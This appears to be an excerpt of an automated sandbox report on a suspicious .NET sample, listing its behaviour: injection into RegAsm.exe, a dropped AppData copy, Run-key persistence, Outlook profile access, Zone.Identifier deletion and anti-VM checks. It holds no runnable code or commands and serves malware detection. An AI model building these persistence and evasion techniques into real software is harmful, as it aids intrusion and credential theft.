Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: 08(2)_00.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 08(2)_00.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: F:\Desktop V500\important\CSharp-RunPE-master\RunPE\obj\Debug\SeaCyanPul.pdb source: 08(2)_00.exe, 00000000.00000002.1433779096.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, 08(2)_00.exe, 00000000.00000002.1432087935.0000000003311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: fOLFRQq.exe, 00000003.00000000.1540965758.00000000003D2000.00000002.00000001.01000000.00000007.sdmp, fOLFRQq.exe.2.dr
Source:	Binary string: RegAsm.pdb4 source: fOLFRQq.exe, 00000003.00000000.1540965758.00000000003D2000.00000002.00000001.01000000.00000007.sdmp, fOLFRQq.exe.2.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: 08(2)_00.exe, FormMain.cs

.Net Code: ANTR3ND0 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\08(2)_00.exe	Code function: 0_2_032A96B2 push eax; iretd	0_2_032A96B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_06FADA50 push es; ret	2_2_06FADA60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_07306391 push es; ret	2_2_073063A0

Source: 08(2)_00.exe

Static PE information: section name: .text entropy: 7.926510501369591

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fOLFRQq			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run fOLFRQq			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File opened: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 08(2)_00.exe PID: 5992, type: MEMORYSTR

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\08(2)_00.exe	Memory allocated: 32A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Memory allocated: 3310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\08(2)_00.exe	Memory allocated: 5310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 14A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 30B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Memory allocated: D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Memory allocated: 2670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Memory allocated: 4670000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Memory allocated: 1780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Memory allocated: 32A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\fOLFRQq\fOLFRQq.exe	Memory allocated: 3110000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\08(2)_00.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199873	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199653	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199424	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199285	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 1199047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599846	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599723	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 599518	Jump to behavior
